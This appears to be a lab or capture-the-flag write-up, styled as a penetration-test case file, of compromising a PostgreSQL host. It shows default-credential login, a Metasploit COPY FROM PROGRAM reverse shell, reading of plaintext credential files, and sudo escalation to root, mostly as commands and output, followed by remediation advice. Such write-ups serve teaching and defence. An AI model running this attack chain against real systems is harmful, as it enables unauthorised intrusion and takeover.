PostgreSQL weak auth, COPY PROGRAM RCE, and credential chaining
Foundations database engagement: Postgres on 5432 accepted postgres:password; Metasploit COPY FROM PROGRAM yielded an OS shell; credentials in dark’s home and config.php chained to alison with full sudo.
- Case files
- PostgreSQL weak auth, COPY PROGRAM RCE, and credential chaining
Weak Postgres credentials enabled hashdump and RCE. Local credential files moved us from dark to alison, who held unrestricted sudo.
nmap found 5432. postgres_login and hashdump confirmed weak superuser access.
postgres_copy_from_program_cmd_exec opened a reverse shell as the DB OS user.
dark’s credentials.txt and config.php unlocked alison; sudo -s returned root.
Engagement summary
Weak Postgres credentials enabled hashdump and RCE. Local credential files moved us from dark to alison, who held unrestricted sudo.
POSTER (10.49.190.166) exposed OpenSSH, Apache, and PostgreSQL 9.5.21 on 5432. Metasploit postgres_login recovered postgres:password. From there postgres_hashdump and postgres_copy_from_program_cmd_exec produced a shell as the database OS user. /home/dark/credentials.txt held dark:qwerty1234#!hackme for SSH; /var/www/html/config.php disclosed alison / p4ssw0rdS3cur3!#. su alison followed by sudo -s completed root — alison had (ALL : ALL) ALL.
Business impact
Default Postgres passwords on internet-facing 5432 are remote compromise. Credential files in home directories and web configs enable rapid lateral movement. Unrestricted sudo on any user is root by policy. Require strong DB auth, bind Postgres to localhost or VPN, scrub secrets from web trees, and revoke blanket sudo.
Postgres login and enumeration
nmap found 5432. postgres_login and hashdump confirmed weak superuser access.
OPERATOR · NMAP
savvy@lab:~$ nmap -sV 10.49.190.166
22/tcp open ssh OpenSSH 7.2p2
80/tcp open http Apache httpd 2.4.18
5432/tcp open postgresql PostgreSQL 9.5.21
OPERATOR · MSF LOGIN
savvy@lab:~$ msfconsole -q
msf6 > use auxiliary/scanner/postgres/postgres_login
msf6 > set RHOSTS 10.49.190.166
msf6 > run
Login Successful: postgres:password
msf6 > use auxiliary/scanner/postgres/postgres_hashdump
msf6 > set PASSWORD password
msf6 > run
# multiple role hashes recovered
COPY PROGRAM RCE
postgres_copy_from_program_cmd_exec opened a reverse shell as the DB OS user.
OPERATOR · RCE
msf6 > use exploit/multi/postgres/postgres_copy_from_program_cmd_exec
msf6 > set RHOSTS 10.49.190.166
msf6 > set PASSWORD password
msf6 > set LHOST tun0
msf6 > run
Command shell session opened
savvy@lab:~$ python3 -c 'import pty;pty.spawn("/bin/bash")'
Credential chain to alison sudo
dark’s credentials.txt and config.php unlocked alison; sudo -s returned root.
OPERATOR · LATERAL / ROOT
savvy@lab:~$ cat /home/dark/credentials.txt
dark:qwerty1234#!hackme
savvy@lab:~$ ssh dark@10.49.190.166
savvy@lab:~$ grep -E 'uname|pass' /var/www/html/config.php
alison / p4ssw0rdS3cur3!#
savvy@lab:~$ su alison
savvy@lab:~$ sudo -l
(ALL : ALL) ALL
savvy@lab:~$ sudo -s
root@lab:~# id
uid=0(root) gid=0(root) groups=0(root)
Remediation
Disable remote Postgres or require certificate auth; rotate the postgres password. Remove credential files from home directories and web roots. Replace ALL sudo with least-privilege commands.